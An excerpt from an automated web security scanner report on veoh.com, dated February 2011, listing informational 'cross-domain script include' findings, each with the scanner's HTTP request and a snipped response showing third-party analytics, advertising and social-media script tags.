<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769487"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.8. http://www.veoh.com/browse/tvshows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/tvshows HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:33:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=54
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768802"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.9. http://www.veoh.com/browse/tvshows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/tvshows/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/tvshows/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:00 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 78636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769140"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.10. http://www.veoh.com/browse/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:30:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=57
Content-Length: 116662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768607"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.11. http://www.veoh.com/browse/videos/category/action_adventure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 115983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768565"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.12. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 135910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18647177dJ8p2YBE&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768476"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.13. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v189741093prNNZM5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v189741093prNNZM5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 134924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v189741093prNNZM5&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768502"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.14. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:02 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768543"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.15. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=82
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768467"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.16. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
